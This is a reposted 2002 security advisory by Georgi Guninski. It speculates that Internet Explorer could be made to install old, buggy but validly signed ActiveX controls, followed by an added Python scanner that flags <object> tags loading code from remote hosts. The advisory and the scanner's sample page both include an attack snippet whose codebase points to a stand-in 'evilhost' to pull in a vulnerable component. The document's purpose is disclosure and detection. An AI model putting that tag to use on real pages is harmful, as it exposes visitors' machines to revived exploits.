Digitally signing buggy ActiveX components

Georgi Guninski raises an interesting question:

http://www.guninski.com/signedactivex.html
Digitally signing buggy ActiveX components

Date: 14 February 2002

Disclaimer:

This is just an unverified suspicion. I don't claim this information is
true.

The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Description:

Back in 1999 Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES> made an
excellent point at:
http://archives.neohapsis.com/archives/ntbugtraq/1998-1999/msg00422.html
-------------------
3- Even if Microsoft fixes the hole, the hole could exist forever. Why?
As far as I know this is the first time a hole is "SIGNED".
MS has released a "dhtmed.cab" file as an ActiveX component signed by
Microsoft
-------------------

Here is more on this.

ActiveX in Internet Explorer allows downloading from the web and installing
signed components (native code) on the user's computer.

As history shows, a lot of ActiveX components are buggy and a new version is
released. The interesting part is that the buggy version is still really signed
and available in one form or another.

A purely hypothetical scenario is to try to install the old buggy signed version
if the user doesn't have it, or on top of the patched one.
Basically this is done this way:
--------------------
<object codebase="http://evilhost/buggyreallysigned.file"
classid="clsid:speciallycrafted">
</object>
--------------------
So, I wonder whether doing such mischief may lead to old exploits starting to
work again?

Workaround/Solution:
I don't know whether this is a real threat; this is just a suspicion.
Anyway, to prevent such stuff, in the Internet Explorer security options
disable everything that contains "active".
Or at least, if you see a prompt "...This is digitally signed by X...",
think about whether you really trust X, keeping in mind his security record.

Regards,
Georgi Guninski
http://www.guninski.com
maggie
2/15/2002 6:23:00 AM
grc.security

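The advisory above describes the pattern a page would use to pull a signed component from a host other than the one serving the page: an <object> tag whose codebase points elsewhere. The following Python scanner is an added example for the defender's side (a proxy filter, a web-log review, or a site audit); it is not code from Guninski's advisory or from grc.security. It parses HTML, reports every <object> tag that carries a codebase, records the classid and any "#Version=a,b,c,d" suffix IE understands, and flags the ones whose codebase host differs from the page's own host. The sample HTML, the page URL "http://www.example.test/page.html", and the two extra CLSIDs are constructed for the example; only the "evilhost" object tag comes from the advisory itself.

```python
"""Flag <object> tags whose codebase fetches a component from a remote host.

Added example for the advisory above; the sample page and URLs are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class ObjectTagScanner(HTMLParser):
    """Collects the attributes of every <object> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.objects = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases attribute names; values may be None for bare attrs.
        if tag.lower() == "object":
            self.objects.append({name: (value or "") for name, value in attrs})


def parse_codebase(codebase):
    """Split an IE codebase value into (url, version_tuple_or_None).

    IE accepts a "#Version=a,b,c,d" suffix naming the control version the
    page asks for; without it nothing in the tag pins which build is served.
    """
    url, _, fragment = codebase.partition("#")
    version = None
    if fragment.lower().startswith("version="):
        try:
            version = tuple(int(part) for part in fragment[len("version="):].split(","))
        except ValueError:
            version = None  # malformed suffix: treat as unpinned
    return url.strip(), version


def find_remote_codebase(html, page_url):
    """Return one finding per <object> tag that has a codebase attribute.

    A finding is marked remote when the codebase host is not the page's host;
    that is the shape of the rollback trick the advisory describes.
    """
    page_host = (urlparse(page_url).hostname or "").lower()
    scanner = ObjectTagScanner()
    scanner.feed(html)
    findings = []
    for attrs in scanner.objects:
        codebase = attrs.get("codebase")
        if not codebase:
            continue
        url, version = parse_codebase(codebase)
        host = urlparse(url).hostname
        if host is None:
            host = page_host  # relative codebase resolves against the page itself
        findings.append({
            "classid": attrs.get("classid", ""),
            "codebase_url": url,
            "codebase_host": host.lower(),
            "pinned_version": version,
            "remote": host.lower() != page_host,
        })
    return findings


# Constructed sample page: the first tag is the advisory's own snippet, the
# other two (same-host CAB with a version pin, and an object with no codebase)
# are made up to show the non-flagged cases.
SAMPLE_PAGE = """
<html><body>
<object codebase="http://evilhost/buggyreallysigned.file"
        classid="clsid:speciallycrafted"></object>
<object classid="clsid:00000000-0000-0000-0000-000000000000"
        codebase="/controls/viewer.cab#Version=2,0,0,1"></object>
<object classid="clsid:11111111-1111-1111-1111-111111111111"></object>
</body></html>
"""

if __name__ == "__main__":
    for finding in find_remote_codebase(SAMPLE_PAGE, "http://www.example.test/page.html"):
        flag = "REMOTE" if finding["remote"] else "local "
        print(f'{flag} {finding["classid"]} <- {finding["codebase_url"]} '
              f'version={finding["pinned_version"]}')
```

A remote codebase is not proof of abuse (a vendor may host its controls on a CDN), but it is the condition under which the advisory's scenario is possible, so it is the right thing to surface for review; a pinned version tells the reviewer which build the page is asking for.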